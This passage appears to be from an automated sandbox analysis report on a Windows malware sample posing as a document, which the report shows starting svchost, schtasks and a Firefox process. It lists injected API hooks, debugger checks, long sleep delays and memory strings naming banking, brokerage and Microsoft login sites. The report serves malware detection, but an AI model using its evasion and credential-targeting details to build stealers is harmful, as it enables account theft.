            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeFile created: C:\Users\user\AppData\Local\Temp\outvauntsJump to behavior
            Source: Doc 784-01965670.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: schtasks.exe, 00000004.00000002.4508662469.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000810000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2400687700.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2400783650.00000000007E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Doc 784-01965670.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeFile read: C:\Users\user\Desktop\Doc 784-01965670.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Doc 784-01965670.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Doc 784-01965670.exe"Jump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Doc 784-01965670.exeStatic file information: File size 1321247 > 1048576
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jEsBIhfnof.exe, 00000003.00000002.4509238213.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp, jEsBIhfnof.exe, 00000006.00000000.2290300485.0000000000C2E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Doc 784-01965670.exe, 00000000.00000003.2051685242.0000000004620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2130236373.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131854715.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2220841061.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.2223204393.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2224989502.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4510116276.000000000304E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.2188818798.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2188967652.000000000345A000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.0000000000924000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000003.00000002.4508686603.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4510450854.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp, jEsBIhfnof.exe, 00000006.00000002.4509603605.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2509345091.000000003CE2C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress | 0_2_0040EB70
            Source: Doc 784-01965670.exe | Static PE information: real checksum: 0xa2135 should be: 0x144463
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_004171D1 push ecx; ret | 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401803 push ds; iretd | 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416033 pushfd ; ret | 2_2_0041609B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408199 pushad ; ret | 2_2_004081C5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00415AF3 push eax; ret | 2_2_00415B63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041CAFD push ss; retf | 2_2_0041CB05
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417AAE push FFFFFFD9h; ret | 2_2_00417AB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004013E0 push ds; iretd | 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413BEE push 0000003Ah; ret | 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040CB98 push 7D3987A0h; iretd | 2_2_0040CB9D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413C43 push 0000003Ah; ret | 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E420 push ecx; iretd | 2_2_0041E45E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413C8A push ecx; iretd | 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413D28 push edx; ret | 2_2_00413D64
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413D28 push ecx; iretd | 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413DB0 push ecx; iretd | 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040668E push esi; retf | 2_2_00406692
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402EA0 push eax; ret | 2_2_00402EA2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EEAC push es; ret | 2_2_0041EEBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413F34 push eax; retf | 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401786 push ds; iretd | 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413FA5 push eax; retf | 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0225F pushad ; ret | 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B027FA pushad ; ret | 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx | 2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0283D push eax; iretd | 2_2_03B02858
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02EB225F pushad ; ret | 4_2_02EB27F9
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02EB27FA pushad ; ret | 4_2_02EB27F9
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02EB283D push eax; iretd | 4_2_02EB2858
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02EE09AD push ecx; mov dword ptr [esp], ecx | 4_2_02EE09B6
            Source: C:\Windows\SysWOW64\schtasks.exe | Code function: 4_2_02EB1368 push eax; iretd | 4_2_02EB1369

            Boot Survival

            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_004772DE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_004375B0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Code function: 0_2_00444078 | 0_2_00444078
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | API/Special instruction interceptor: Address: 3F95264
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc | 2_2_03B7096E
            Source: C:\Windows\SysWOW64\schtasks.exe | Window / User API: threadDelayed 9694
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-86310
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_0-84957
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe | API coverage: 3.0 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exe | API coverage: 2.4 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432 | Thread sleep count: 278 > 30
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432 | Thread sleep time: -556000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432 | Thread sleep count: 9694 > 30
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 432 | Thread sleep time: -19388000s >= -30000s
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052 | Thread sleep time: -95000s >= -30000s
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052 | Thread sleep count: 37 > 30
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052 | Thread sleep time: -55500s >= -30000s
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052 | Thread sleep count: 48 > 30
            Source: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe TID: 4052 | Thread sleep time: -48000s >= -30000s
            Source: C:\Windows\SysWOW64\schtasks.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0045C310 FindFirstFileW,FindNextFileW,FindClose,4_2_0045C310
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: 6222f67M.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 6222f67M.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 6222f67M.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 6222f67M.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: firefox.exe, 00000007.00000002.2511342240.000001843CD9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
            Source: 6222f67M.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 6222f67M.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: jEsBIhfnof.exe, 00000006.00000002.4509189886.000000000141F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: 6222f67M.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 6222f67M.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 6222f67M.4.dr; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 6222f67M.4.dr; Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 6222f67M.4.dr; Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 6222f67M.4.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: schtasks.exe, 00000004.00000002.4508662469.0000000000763000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 6222f67M.4.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 6222f67M.4.dr; Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 6222f67M.4.dr; Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 6222f67M.4.dr; Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 6222f67M.4.dr; Binary or memory string: AMC password management pageVMware20,11696428655
Source: 6222f67M.4.dr; Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 6222f67M.4.dr; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 6222f67M.4.dr; Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 6222f67M.4.dr; Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 6222f67M.4.dr; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 6222f67M.4.dr; Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 6222f67M.4.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 6222f67M.4.dr; Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 6222f67M.4.dr; Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 6222f67M.4.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 6222f67M.4.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\Doc 784-01965670.exe; API call chain: ExitProcess graph end node (graph_0-84837)
Source: C:\Users\user\Desktop\Doc 784-01965670.exe; API call chain: ExitProcess graph end node (graph_0-84916)
Source: C:\Windows\SysWOW64\svchost.exe; Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\schtasks.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B7096E rdtsc (2_2_03B7096E)
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_004171B3 LdrLoadDll (2_2_004171B3)
Source: C:\Users\user\Desktop\Doc 784-01965670.exe; Code function: 0_2_0045A259 BlockInput (0_2_0045A259)
Source: C:\Users\user\Desktop\Doc 784-01965670.exe; Code function: 0_2_0040D6D0 GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetModuleFileNameW, GetForegroundWindow, ShellExecuteW, GetForegroundWindow, ShellExecuteW (0_2_0040D6D0)
